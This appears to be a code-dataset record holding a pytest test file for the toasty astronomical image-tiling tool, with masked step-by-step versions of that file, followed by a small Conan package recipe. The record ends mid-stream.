self.WTML.replace('Thumbnail="thumb.jpg"', "").replace(
"<ThumbnailUrl>thumb.jpg</ThumbnailUrl>",
"<ThumbnailUrl></ThumbnailUrl>",
)
)
args = [
"tile-multi-tan",
"--hdu-index",
"0",
"--outdir",
self.work_path("basic_cli"),
test_path("wcs512.fits.gz"),
]
cli.entrypoint(args)
with open(
self.work_path("basic_cli", "index_rel.wtml"), "rt", encoding="utf8"
) as f:
observed = etree.fromstring(f.read())
assert_xml_elements_equal(observed, expected)
args = [
"cascade",
"--start",
"1",
self.work_path("basic_cli"),
]
cli.entrypoint(args)
self.maybe_test_barycenter(
self.work_path("basic_cli", "0", "0", "0_0.fits"), self.WCS512_BARYDATA
)
def test_study_cli(self):
"""
Test tile-study on FITS. This should properly go in test_study.py, but
this file is the one that has the reference WTML information.
"""
expected = etree.fromstring(self.WTML)
args = [
"tile-study",
"--placeholder-thumbnail",
"--outdir",
self.work_path("study_cli"),
test_path("wcs512.fits.gz"),
]
cli.entrypoint(args)
with open(
self.work_path("study_cli", "index_rel.wtml"), "rt", encoding="utf8"
) as f:
observed = etree.fromstring(f.read())
assert_xml_elements_equal(observed, expected)
args = [
"cascade",
"--start",
"1",
self.work_path("study_cli"),
]
cli.entrypoint(args)
self.maybe_test_barycenter(
self.work_path("study_cli", "0", "0", "0_0.fits"), self.WCS512_BARYDATA
)
@pytest.mark.skipif("not HAS_REPROJECT")
def test_as_multi_wcs(self):
"""
Once again, this doesn't super belong here, but this is where we have
the reference data. We don't compare the WTML contents here since the
reprojection isn't going to preserve the WCS in detail.
"""
from .. import builder, collection, multi_wcs, pyramid
reproject_function = reproject.reproject_interp
outdir = self.work_path("as_multi_wcs")
pio = pyramid.PyramidIO(outdir, default_format="fits")
bld = builder.Builder(pio)
coll = collection.SimpleFitsCollection(
[test_path("wcs512.fits.gz")], hdu_index=0
)
proc = multi_wcs.MultiWcsProcessor(coll)
proc.compute_global_pixelization(bld)
proc.tile(pio, reproject_function, cli_progress=False, parallel=1)
bld.write_index_rel_wtml()
args = [
"cascade",
"--start",
"1",
self.work_path("as_multi_wcs"),
]
cli.entrypoint(args)
self.maybe_test_barycenter(
self.work_path("as_multi_wcs", "0", "0", "0_0.fits"), self.WCS512_BARYDATA
)
|
normal
|
{
"blob_id": "618b6c74133e181ce5cbaf4e969d9fc3aa44ce98",
"index": 1261,
"step-1": "<mask token>\n\n\nclass TestMultiTan(object):\n <mask token>\n if sys.platform == 'darwin':\n WTML = WTML.replace('Dec=\"0.7438249862258411\"',\n 'Dec=\"0.743824986225841\"')\n <mask token>\n\n def teardown_method(self, method):\n from shutil import rmtree\n rmtree(self.work_dir)\n <mask token>\n <mask token>\n <mask token>\n\n def maybe_test_barycenter(self, path, bary_expected):\n \"\"\"\n Check the barycenters of four 128x128 quadrants of a tile file. The idea\n here is that if we introduce a problem with vertical flips in tiled FITS\n processing, we'll detect it here.\n \"\"\"\n if not HAS_ASTRO:\n return\n with fits.open(path) as hdul:\n data = hdul[0].data\n data[~np.isfinite(data)] = 0.0\n bary_observed = []\n for islice in self.BARY_SLICES:\n idata = data[islice]\n yidx, xidx = np.indices((128, 128))\n xbary = (idata * xidx).sum() / idata.sum()\n ybary = (idata * yidx).sum() / idata.sum()\n bary_observed.append((xbary, ybary))\n nt.assert_array_almost_equal(bary_observed, bary_expected, decimal=5)\n <mask token>\n\n def test_basic_cli(self):\n \"\"\"\n Test the CLI interface. We don't go out of our way to validate the\n computations in detail -- that's for the unit tests that probe the\n module directly.\n \"\"\"\n expected = etree.fromstring(self.WTML.replace(\n 'Thumbnail=\"thumb.jpg\"', '').replace(\n '<ThumbnailUrl>thumb.jpg</ThumbnailUrl>',\n '<ThumbnailUrl></ThumbnailUrl>'))\n args = ['tile-multi-tan', '--hdu-index', '0', '--outdir', self.\n work_path('basic_cli'), test_path('wcs512.fits.gz')]\n cli.entrypoint(args)\n with open(self.work_path('basic_cli', 'index_rel.wtml'), 'rt',\n encoding='utf8') as f:\n observed = etree.fromstring(f.read())\n assert_xml_elements_equal(observed, expected)\n args = ['cascade', '--start', '1', self.work_path('basic_cli')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('basic_cli', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n <mask token>\n\n @pytest.mark.skipif('not HAS_REPROJECT')\n def test_as_multi_wcs(self):\n \"\"\"\n Once again, this doesn't super belong here, but this is where we have\n the reference data. We don't compare the WTML contents here since the\n reprojection isn't going to preserve the WCS in detail.\n \"\"\"\n from .. import builder, collection, multi_wcs, pyramid\n reproject_function = reproject.reproject_interp\n outdir = self.work_path('as_multi_wcs')\n pio = pyramid.PyramidIO(outdir, default_format='fits')\n bld = builder.Builder(pio)\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')\n ], hdu_index=0)\n proc = multi_wcs.MultiWcsProcessor(coll)\n proc.compute_global_pixelization(bld)\n proc.tile(pio, reproject_function, cli_progress=False, parallel=1)\n bld.write_index_rel_wtml()\n args = ['cascade', '--start', '1', self.work_path('as_multi_wcs')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('as_multi_wcs', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n",
"step-2": "<mask token>\n\n\nclass TestMultiTan(object):\n <mask token>\n if sys.platform == 'darwin':\n WTML = WTML.replace('Dec=\"0.7438249862258411\"',\n 'Dec=\"0.743824986225841\"')\n <mask token>\n\n def teardown_method(self, method):\n from shutil import rmtree\n rmtree(self.work_dir)\n <mask token>\n\n def test_basic(self):\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')])\n proc = multi_tan.MultiTanProcessor(coll)\n from ..pyramid import PyramidIO\n pio = PyramidIO(self.work_path('basic'), default_format='fits')\n builder = Builder(pio)\n proc.compute_global_pixelization(builder)\n proc.tile(pio)\n <mask token>\n\n def maybe_test_barycenter(self, path, bary_expected):\n \"\"\"\n Check the barycenters of four 128x128 quadrants of a tile file. The idea\n here is that if we introduce a problem with vertical flips in tiled FITS\n processing, we'll detect it here.\n \"\"\"\n if not HAS_ASTRO:\n return\n with fits.open(path) as hdul:\n data = hdul[0].data\n data[~np.isfinite(data)] = 0.0\n bary_observed = []\n for islice in self.BARY_SLICES:\n idata = data[islice]\n yidx, xidx = np.indices((128, 128))\n xbary = (idata * xidx).sum() / idata.sum()\n ybary = (idata * yidx).sum() / idata.sum()\n bary_observed.append((xbary, ybary))\n nt.assert_array_almost_equal(bary_observed, bary_expected, decimal=5)\n <mask token>\n\n def test_basic_cli(self):\n \"\"\"\n Test the CLI interface. We don't go out of our way to validate the\n computations in detail -- that's for the unit tests that probe the\n module directly.\n \"\"\"\n expected = etree.fromstring(self.WTML.replace(\n 'Thumbnail=\"thumb.jpg\"', '').replace(\n '<ThumbnailUrl>thumb.jpg</ThumbnailUrl>',\n '<ThumbnailUrl></ThumbnailUrl>'))\n args = ['tile-multi-tan', '--hdu-index', '0', '--outdir', self.\n work_path('basic_cli'), test_path('wcs512.fits.gz')]\n cli.entrypoint(args)\n with open(self.work_path('basic_cli', 'index_rel.wtml'), 'rt',\n encoding='utf8') as f:\n observed = etree.fromstring(f.read())\n assert_xml_elements_equal(observed, expected)\n args = ['cascade', '--start', '1', self.work_path('basic_cli')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('basic_cli', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n <mask token>\n\n @pytest.mark.skipif('not HAS_REPROJECT')\n def test_as_multi_wcs(self):\n \"\"\"\n Once again, this doesn't super belong here, but this is where we have\n the reference data. We don't compare the WTML contents here since the\n reprojection isn't going to preserve the WCS in detail.\n \"\"\"\n from .. import builder, collection, multi_wcs, pyramid\n reproject_function = reproject.reproject_interp\n outdir = self.work_path('as_multi_wcs')\n pio = pyramid.PyramidIO(outdir, default_format='fits')\n bld = builder.Builder(pio)\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')\n ], hdu_index=0)\n proc = multi_wcs.MultiWcsProcessor(coll)\n proc.compute_global_pixelization(bld)\n proc.tile(pio, reproject_function, cli_progress=False, parallel=1)\n bld.write_index_rel_wtml()\n args = ['cascade', '--start', '1', self.work_path('as_multi_wcs')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('as_multi_wcs', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n",
"step-3": "<mask token>\n\n\nclass TestMultiTan(object):\n <mask token>\n if sys.platform == 'darwin':\n WTML = WTML.replace('Dec=\"0.7438249862258411\"',\n 'Dec=\"0.743824986225841\"')\n\n def setup_method(self, method):\n from tempfile import mkdtemp\n self.work_dir = mkdtemp()\n\n def teardown_method(self, method):\n from shutil import rmtree\n rmtree(self.work_dir)\n\n def work_path(self, *pieces):\n return os.path.join(self.work_dir, *pieces)\n\n def test_basic(self):\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')])\n proc = multi_tan.MultiTanProcessor(coll)\n from ..pyramid import PyramidIO\n pio = PyramidIO(self.work_path('basic'), default_format='fits')\n builder = Builder(pio)\n proc.compute_global_pixelization(builder)\n proc.tile(pio)\n <mask token>\n\n def maybe_test_barycenter(self, path, bary_expected):\n \"\"\"\n Check the barycenters of four 128x128 quadrants of a tile file. The idea\n here is that if we introduce a problem with vertical flips in tiled FITS\n processing, we'll detect it here.\n \"\"\"\n if not HAS_ASTRO:\n return\n with fits.open(path) as hdul:\n data = hdul[0].data\n data[~np.isfinite(data)] = 0.0\n bary_observed = []\n for islice in self.BARY_SLICES:\n idata = data[islice]\n yidx, xidx = np.indices((128, 128))\n xbary = (idata * xidx).sum() / idata.sum()\n ybary = (idata * yidx).sum() / idata.sum()\n bary_observed.append((xbary, ybary))\n nt.assert_array_almost_equal(bary_observed, bary_expected, decimal=5)\n <mask token>\n\n def test_basic_cli(self):\n \"\"\"\n Test the CLI interface. We don't go out of our way to validate the\n computations in detail -- that's for the unit tests that probe the\n module directly.\n \"\"\"\n expected = etree.fromstring(self.WTML.replace(\n 'Thumbnail=\"thumb.jpg\"', '').replace(\n '<ThumbnailUrl>thumb.jpg</ThumbnailUrl>',\n '<ThumbnailUrl></ThumbnailUrl>'))\n args = ['tile-multi-tan', '--hdu-index', '0', '--outdir', self.\n work_path('basic_cli'), test_path('wcs512.fits.gz')]\n cli.entrypoint(args)\n with open(self.work_path('basic_cli', 'index_rel.wtml'), 'rt',\n encoding='utf8') as f:\n observed = etree.fromstring(f.read())\n assert_xml_elements_equal(observed, expected)\n args = ['cascade', '--start', '1', self.work_path('basic_cli')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('basic_cli', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n\n def test_study_cli(self):\n \"\"\"\n Test tile-study on FITS. This should properly go in test_study.py, but\n this file is the one that has the reference WTML information.\n \"\"\"\n expected = etree.fromstring(self.WTML)\n args = ['tile-study', '--placeholder-thumbnail', '--outdir', self.\n work_path('study_cli'), test_path('wcs512.fits.gz')]\n cli.entrypoint(args)\n with open(self.work_path('study_cli', 'index_rel.wtml'), 'rt',\n encoding='utf8') as f:\n observed = etree.fromstring(f.read())\n assert_xml_elements_equal(observed, expected)\n args = ['cascade', '--start', '1', self.work_path('study_cli')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('study_cli', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n\n @pytest.mark.skipif('not HAS_REPROJECT')\n def test_as_multi_wcs(self):\n \"\"\"\n Once again, this doesn't super belong here, but this is where we have\n the reference data. We don't compare the WTML contents here since the\n reprojection isn't going to preserve the WCS in detail.\n \"\"\"\n from .. import builder, collection, multi_wcs, pyramid\n reproject_function = reproject.reproject_interp\n outdir = self.work_path('as_multi_wcs')\n pio = pyramid.PyramidIO(outdir, default_format='fits')\n bld = builder.Builder(pio)\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')\n ], hdu_index=0)\n proc = multi_wcs.MultiWcsProcessor(coll)\n proc.compute_global_pixelization(bld)\n proc.tile(pio, reproject_function, cli_progress=False, parallel=1)\n bld.write_index_rel_wtml()\n args = ['cascade', '--start', '1', self.work_path('as_multi_wcs')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('as_multi_wcs', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n",
"step-4": "<mask token>\n\n\nclass TestMultiTan(object):\n WTML = \"\"\"\n<Folder Browseable=\"True\" Group=\"Explorer\" Name=\"Toasty\" Searchable=\"True\">\n <Place\n Angle=\"0\"\n AngularSize=\"0\"\n Constellation=\"VIR\"\n DataSetType=\"Sky\"\n Dec=\"0.7438249862258411\"\n Magnitude=\"0\"\n Name=\"Toasty\"\n Opacity=\"100\"\n RA=\"14.41975153073335\"\n Rotation=\"0\"\n Thumbnail=\"thumb.jpg\"\n ZoomLevel=\"0.2437119999998555\"\n >\n <ForegroundImageSet>\n <ImageSet\n BandPass=\"Visible\"\n BaseDegreesPerTile=\"0.023893333333319167\"\n BaseTileLevel=\"0\"\n BottomsUp=\"False\"\n CenterX=\"216.2962962963\"\n CenterY=\"0.74380165289257\"\n DataSetType=\"Sky\"\n ElevationModel=\"False\"\n FileType=\".fits\"\n Generic=\"False\"\n Name=\"Toasty\"\n OffsetX=\"2.33333333333195e-05\"\n OffsetY=\"2.33333333333195e-05\"\n Projection=\"Tan\"\n QuadTreeMap=\"\"\n Rotation=\"-0\"\n Sparse=\"True\"\n StockSet=\"False\"\n TileLevels=\"1\"\n Url=\"{1}/{3}/{3}_{2}.fits\"\n WidthFactor=\"2\"\n >\n <ThumbnailUrl>thumb.jpg</ThumbnailUrl>\n </ImageSet>\n </ForegroundImageSet>\n </Place>\n</Folder>\"\"\"\n if sys.platform == 'darwin':\n WTML = WTML.replace('Dec=\"0.7438249862258411\"',\n 'Dec=\"0.743824986225841\"')\n\n def setup_method(self, method):\n from tempfile import mkdtemp\n self.work_dir = mkdtemp()\n\n def teardown_method(self, method):\n from shutil import rmtree\n rmtree(self.work_dir)\n\n def work_path(self, *pieces):\n return os.path.join(self.work_dir, *pieces)\n\n def test_basic(self):\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')])\n proc = multi_tan.MultiTanProcessor(coll)\n from ..pyramid import PyramidIO\n pio = PyramidIO(self.work_path('basic'), default_format='fits')\n builder = Builder(pio)\n proc.compute_global_pixelization(builder)\n proc.tile(pio)\n BARY_SLICES = [(slice(0, 128), slice(0, 128)), (slice(0, 128), slice(\n 128, None)), (slice(128, None), slice(0, 128)), (slice(128, None),\n slice(128, None))]\n\n def maybe_test_barycenter(self, path, bary_expected):\n \"\"\"\n Check the barycenters of four 128x128 quadrants of a tile file. The idea\n here is that if we introduce a problem with vertical flips in tiled FITS\n processing, we'll detect it here.\n \"\"\"\n if not HAS_ASTRO:\n return\n with fits.open(path) as hdul:\n data = hdul[0].data\n data[~np.isfinite(data)] = 0.0\n bary_observed = []\n for islice in self.BARY_SLICES:\n idata = data[islice]\n yidx, xidx = np.indices((128, 128))\n xbary = (idata * xidx).sum() / idata.sum()\n ybary = (idata * yidx).sum() / idata.sum()\n bary_observed.append((xbary, ybary))\n nt.assert_array_almost_equal(bary_observed, bary_expected, decimal=5)\n WCS512_BARYDATA = [(63.44949378800272, 64.40535387506924), (\n 63.24744175084746, 63.67473452789256), (65.22950207855361, \n 63.35629429568745), (62.027396724898814, 62.815937534782144)]\n\n def test_basic_cli(self):\n \"\"\"\n Test the CLI interface. We don't go out of our way to validate the\n computations in detail -- that's for the unit tests that probe the\n module directly.\n \"\"\"\n expected = etree.fromstring(self.WTML.replace(\n 'Thumbnail=\"thumb.jpg\"', '').replace(\n '<ThumbnailUrl>thumb.jpg</ThumbnailUrl>',\n '<ThumbnailUrl></ThumbnailUrl>'))\n args = ['tile-multi-tan', '--hdu-index', '0', '--outdir', self.\n work_path('basic_cli'), test_path('wcs512.fits.gz')]\n cli.entrypoint(args)\n with open(self.work_path('basic_cli', 'index_rel.wtml'), 'rt',\n encoding='utf8') as f:\n observed = etree.fromstring(f.read())\n assert_xml_elements_equal(observed, expected)\n args = ['cascade', '--start', '1', self.work_path('basic_cli')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('basic_cli', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n\n def test_study_cli(self):\n \"\"\"\n Test tile-study on FITS. This should properly go in test_study.py, but\n this file is the one that has the reference WTML information.\n \"\"\"\n expected = etree.fromstring(self.WTML)\n args = ['tile-study', '--placeholder-thumbnail', '--outdir', self.\n work_path('study_cli'), test_path('wcs512.fits.gz')]\n cli.entrypoint(args)\n with open(self.work_path('study_cli', 'index_rel.wtml'), 'rt',\n encoding='utf8') as f:\n observed = etree.fromstring(f.read())\n assert_xml_elements_equal(observed, expected)\n args = ['cascade', '--start', '1', self.work_path('study_cli')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('study_cli', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n\n @pytest.mark.skipif('not HAS_REPROJECT')\n def test_as_multi_wcs(self):\n \"\"\"\n Once again, this doesn't super belong here, but this is where we have\n the reference data. We don't compare the WTML contents here since the\n reprojection isn't going to preserve the WCS in detail.\n \"\"\"\n from .. import builder, collection, multi_wcs, pyramid\n reproject_function = reproject.reproject_interp\n outdir = self.work_path('as_multi_wcs')\n pio = pyramid.PyramidIO(outdir, default_format='fits')\n bld = builder.Builder(pio)\n coll = collection.SimpleFitsCollection([test_path('wcs512.fits.gz')\n ], hdu_index=0)\n proc = multi_wcs.MultiWcsProcessor(coll)\n proc.compute_global_pixelization(bld)\n proc.tile(pio, reproject_function, cli_progress=False, parallel=1)\n bld.write_index_rel_wtml()\n args = ['cascade', '--start', '1', self.work_path('as_multi_wcs')]\n cli.entrypoint(args)\n self.maybe_test_barycenter(self.work_path('as_multi_wcs', '0', '0',\n '0_0.fits'), self.WCS512_BARYDATA)\n",
"step-5": "# -*- mode: python; coding: utf-8 -*-\n# Copyright 2019-2021 the AAS WorldWide Telescope project\n# Licensed under the MIT License.\n\nfrom __future__ import absolute_import, division, print_function\n\nimport numpy as np\nimport numpy.testing as nt\nimport os.path\nimport pytest\nimport sys\nfrom xml.etree import ElementTree as etree\n\nfrom . import assert_xml_elements_equal, test_path\nfrom ..builder import Builder\nfrom .. import cli\nfrom .. import collection\nfrom .. import multi_tan\n\n\ntry:\n from astropy.io import fits\n\n HAS_ASTRO = True\nexcept ImportError:\n HAS_ASTRO = False\n\n\ntry:\n import reproject\n\n HAS_REPROJECT = True\nexcept ImportError:\n HAS_REPROJECT = False\n\n\nclass TestMultiTan(object):\n WTML = \"\"\"\n<Folder Browseable=\"True\" Group=\"Explorer\" Name=\"Toasty\" Searchable=\"True\">\n <Place\n Angle=\"0\"\n AngularSize=\"0\"\n Constellation=\"VIR\"\n DataSetType=\"Sky\"\n Dec=\"0.7438249862258411\"\n Magnitude=\"0\"\n Name=\"Toasty\"\n Opacity=\"100\"\n RA=\"14.41975153073335\"\n Rotation=\"0\"\n Thumbnail=\"thumb.jpg\"\n ZoomLevel=\"0.2437119999998555\"\n >\n <ForegroundImageSet>\n <ImageSet\n BandPass=\"Visible\"\n BaseDegreesPerTile=\"0.023893333333319167\"\n BaseTileLevel=\"0\"\n BottomsUp=\"False\"\n CenterX=\"216.2962962963\"\n CenterY=\"0.74380165289257\"\n DataSetType=\"Sky\"\n ElevationModel=\"False\"\n FileType=\".fits\"\n Generic=\"False\"\n Name=\"Toasty\"\n OffsetX=\"2.33333333333195e-05\"\n OffsetY=\"2.33333333333195e-05\"\n Projection=\"Tan\"\n QuadTreeMap=\"\"\n Rotation=\"-0\"\n Sparse=\"True\"\n StockSet=\"False\"\n TileLevels=\"1\"\n Url=\"{1}/{3}/{3}_{2}.fits\"\n WidthFactor=\"2\"\n >\n <ThumbnailUrl>thumb.jpg</ThumbnailUrl>\n </ImageSet>\n </ForegroundImageSet>\n </Place>\n</Folder>\"\"\"\n\n # Gross workaround for platform differences in the XML output.\n\n if sys.platform == \"darwin\":\n WTML = WTML.replace('Dec=\"0.7438249862258411\"', 'Dec=\"0.743824986225841\"')\n\n # Back to the non-gross stuff.\n\n def setup_method(self, method):\n from tempfile import mkdtemp\n\n self.work_dir = mkdtemp()\n\n def teardown_method(self, method):\n from shutil import rmtree\n\n rmtree(self.work_dir)\n\n def work_path(self, *pieces):\n return os.path.join(self.work_dir, *pieces)\n\n def test_basic(self):\n coll = collection.SimpleFitsCollection([test_path(\"wcs512.fits.gz\")])\n\n proc = multi_tan.MultiTanProcessor(coll)\n\n from ..pyramid import PyramidIO\n\n pio = PyramidIO(self.work_path(\"basic\"), default_format=\"fits\")\n\n builder = Builder(pio)\n\n proc.compute_global_pixelization(builder)\n proc.tile(pio)\n\n BARY_SLICES = [\n (slice(0, 128), slice(0, 128)),\n (slice(0, 128), slice(128, None)),\n (slice(128, None), slice(0, 128)),\n (slice(128, None), slice(128, None)),\n ]\n\n def maybe_test_barycenter(self, path, bary_expected):\n \"\"\"\n Check the barycenters of four 128x128 quadrants of a tile file. The idea\n here is that if we introduce a problem with vertical flips in tiled FITS\n processing, we'll detect it here.\n \"\"\"\n\n if not HAS_ASTRO:\n return\n\n with fits.open(path) as hdul:\n data = hdul[0].data\n\n data[~np.isfinite(data)] = 0.0\n bary_observed = []\n\n for islice in self.BARY_SLICES:\n idata = data[islice]\n yidx, xidx = np.indices((128, 128))\n xbary = (idata * xidx).sum() / idata.sum()\n ybary = (idata * yidx).sum() / idata.sum()\n bary_observed.append((xbary, ybary))\n\n nt.assert_array_almost_equal(bary_observed, bary_expected, decimal=5)\n\n WCS512_BARYDATA = [\n (63.44949378800272, 64.40535387506924),\n (63.24744175084746, 63.67473452789256),\n (65.22950207855361, 63.35629429568745),\n (62.027396724898814, 62.815937534782144),\n ]\n\n def test_basic_cli(self):\n \"\"\"\n Test the CLI interface. We don't go out of our way to validate the\n computations in detail -- that's for the unit tests that probe the\n module directly.\n \"\"\"\n expected = etree.fromstring(\n self.WTML.replace('Thumbnail=\"thumb.jpg\"', \"\").replace(\n \"<ThumbnailUrl>thumb.jpg</ThumbnailUrl>\",\n \"<ThumbnailUrl></ThumbnailUrl>\",\n )\n )\n\n args = [\n \"tile-multi-tan\",\n \"--hdu-index\",\n \"0\",\n \"--outdir\",\n self.work_path(\"basic_cli\"),\n test_path(\"wcs512.fits.gz\"),\n ]\n cli.entrypoint(args)\n\n with open(\n self.work_path(\"basic_cli\", \"index_rel.wtml\"), \"rt\", encoding=\"utf8\"\n ) as f:\n observed = etree.fromstring(f.read())\n\n assert_xml_elements_equal(observed, expected)\n\n args = [\n \"cascade\",\n \"--start\",\n \"1\",\n self.work_path(\"basic_cli\"),\n ]\n cli.entrypoint(args)\n\n self.maybe_test_barycenter(\n self.work_path(\"basic_cli\", \"0\", \"0\", \"0_0.fits\"), self.WCS512_BARYDATA\n )\n\n def test_study_cli(self):\n \"\"\"\n Test tile-study on FITS. This should properly go in test_study.py, but\n this file is the one that has the reference WTML information.\n \"\"\"\n expected = etree.fromstring(self.WTML)\n\n args = [\n \"tile-study\",\n \"--placeholder-thumbnail\",\n \"--outdir\",\n self.work_path(\"study_cli\"),\n test_path(\"wcs512.fits.gz\"),\n ]\n cli.entrypoint(args)\n\n with open(\n self.work_path(\"study_cli\", \"index_rel.wtml\"), \"rt\", encoding=\"utf8\"\n ) as f:\n observed = etree.fromstring(f.read())\n\n assert_xml_elements_equal(observed, expected)\n\n args = [\n \"cascade\",\n \"--start\",\n \"1\",\n self.work_path(\"study_cli\"),\n ]\n cli.entrypoint(args)\n\n self.maybe_test_barycenter(\n self.work_path(\"study_cli\", \"0\", \"0\", \"0_0.fits\"), self.WCS512_BARYDATA\n )\n\n @pytest.mark.skipif(\"not HAS_REPROJECT\")\n def test_as_multi_wcs(self):\n \"\"\"\n Once again, this doesn't super belong here, but this is where we have\n the reference data. We don't compare the WTML contents here since the\n reprojection isn't going to preserve the WCS in detail.\n \"\"\"\n from .. import builder, collection, multi_wcs, pyramid\n\n reproject_function = reproject.reproject_interp\n outdir = self.work_path(\"as_multi_wcs\")\n\n pio = pyramid.PyramidIO(outdir, default_format=\"fits\")\n bld = builder.Builder(pio)\n coll = collection.SimpleFitsCollection(\n [test_path(\"wcs512.fits.gz\")], hdu_index=0\n )\n proc = multi_wcs.MultiWcsProcessor(coll)\n proc.compute_global_pixelization(bld)\n proc.tile(pio, reproject_function, cli_progress=False, parallel=1)\n bld.write_index_rel_wtml()\n\n args = [\n \"cascade\",\n \"--start\",\n \"1\",\n self.work_path(\"as_multi_wcs\"),\n ]\n cli.entrypoint(args)\n\n self.maybe_test_barycenter(\n self.work_path(\"as_multi_wcs\", \"0\", \"0\", \"0_0.fits\"), self.WCS512_BARYDATA\n )\n",
"step-ids": [
5,
6,
9,
10,
13
]
}
|
[
5,
6,
9,
10,
13
] |
from conans import ConanFile, CMake, tools
import os
class Demo(ConanFile):
name = "Demo"
version = "0.1"
license = "<Put the package license here>"
url = "<Package recipe repository url here, for issues about the package>"
description = "<Description of Testlib here>"
settings = "os", "compiler", "build_type", "arch"
options = {"shared": [True, False]}
default_options = "shared=False"
generators = "cmake"
exports_sources = "src/*"
requires = "TestLib/0.1@gbmhunter/testing"
def build(self):
cmake = CMake(self)
cmake.configure(source_folder="src/")
print('BLAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = ' + str(self.deps_cpp_info["TestLib"]))
cmake.build()
def imports(self):
self.copy("*.dll", dst="bin", src="bin")
self.copy("*.dylib*", dst="bin", src="lib")
self.copy('*.so*', dst='bin', src='lib')
def test(self):
if not tools.cross_building(self.settings):
os.chdir("bin")
self.run(".%sexample" % os.sep)
def package(self):
self.copy("*.h", dst="include", src="src")
self.copy("*.lib", dst="lib", keep_path=False)
self.copy("*.dll", dst="bin", keep_path=False)
self.copy("*.dylib*", dst="lib", keep_path=False)
self.copy("*.so", dst="lib", keep_path=False)
self.copy("*.a", dst="lib", keep_path=False)
|
normal
|
{
"blob_id": "c9bc331f4805a956146619c59d183fc3bcbe47cb",
"index": 9728,
"step-1": "<mask token>\n\n\nclass Demo(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def imports(self):\n self.copy('*.dll', dst='bin', src='bin')\n self.copy('*.dylib*', dst='bin', src='lib')\n self.copy('*.so*', dst='bin', src='lib')\n <mask token>\n\n def package(self):\n self.copy('*.h', dst='include', src='src')\n self.copy('*.lib', dst='lib', keep_path=False)\n self.copy('*.dll', dst='bin', keep_path=False)\n self.copy('*.dylib*', dst='lib', keep_path=False)\n self.copy('*.so', dst='lib', keep_path=False)\n self.copy('*.a', dst='lib', keep_path=False)\n",
"step-2": "<mask token>\n\n\nclass Demo(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def imports(self):\n self.copy('*.dll', dst='bin', src='bin')\n self.copy('*.dylib*', dst='bin', src='lib')\n self.copy('*.so*', dst='bin', src='lib')\n\n def test(self):\n if not tools.cross_building(self.settings):\n os.chdir('bin')\n self.run('.%sexample' % os.sep)\n\n def package(self):\n self.copy('*.h', dst='include', src='src')\n self.copy('*.lib', dst='lib', keep_path=False)\n self.copy('*.dll', dst='bin', keep_path=False)\n self.copy('*.dylib*', dst='lib', keep_path=False)\n self.copy('*.so', dst='lib', keep_path=False)\n self.copy('*.a', dst='lib', keep_path=False)\n",
"step-3": "<mask token>\n\n\nclass Demo(ConanFile):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def build(self):\n cmake = CMake(self)\n cmake.configure(source_folder='src/')\n print('BLAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = ' + str(self.\n deps_cpp_info['TestLib']))\n cmake.build()\n\n def imports(self):\n self.copy('*.dll', dst='bin', src='bin')\n self.copy('*.dylib*', dst='bin', src='lib')\n self.copy('*.so*', dst='bin', src='lib')\n\n def test(self):\n if not tools.cross_building(self.settings):\n os.chdir('bin')\n self.run('.%sexample' % os.sep)\n\n def package(self):\n self.copy('*.h', dst='include', src='src')\n self.copy('*.lib', dst='lib', keep_path=False)\n self.copy('*.dll', dst='bin', keep_path=False)\n self.copy('*.dylib*', dst='lib', keep_path=False)\n self.copy('*.so', dst='lib', keep_path=False)\n self.copy('*.a', dst='lib', keep_path=False)\n",
"step-4": "<mask token>\n\n\nclass Demo(ConanFile):\n name = 'Demo'\n version = '0.1'\n license = '<Put the package license here>'\n url = '<Package recipe repository url here, for issues about the package>'\n description = '<Description of Testlib here>'\n settings = 'os', 'compiler', 'build_type', 'arch'\n options = {'shared': [True, False]}\n default_options = 'shared=False'\n generators = 'cmake'\n exports_sources = 'src/*'\n requires = 'TestLib/0.1@gbmhunter/testing'\n\n def build(self):\n cmake = CMake(self)\n cmake.configure(source_folder='src/')\n print('BLAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH = ' + str(self.\n deps_cpp_info['TestLib']))\n cmake.build()\n\n def imports(self):\n self.copy('*.dll', dst='bin', src='bin')\n self.copy('*.dylib*', dst='bin', src='lib')\n self.copy('*.so*', dst='bin', src='lib')\n\n def test(self):\n if not tools.cross_building(self.settings):\n os.chdir('bin')\n self.run('.%sexample' % os.sep)\n\n def package(self):\n self.copy('*.h', dst='include', src='src')\n self.copy('*.lib', dst='lib', keep_path=False)\n self.copy('*.dll', dst='bin', keep_path=False)\n 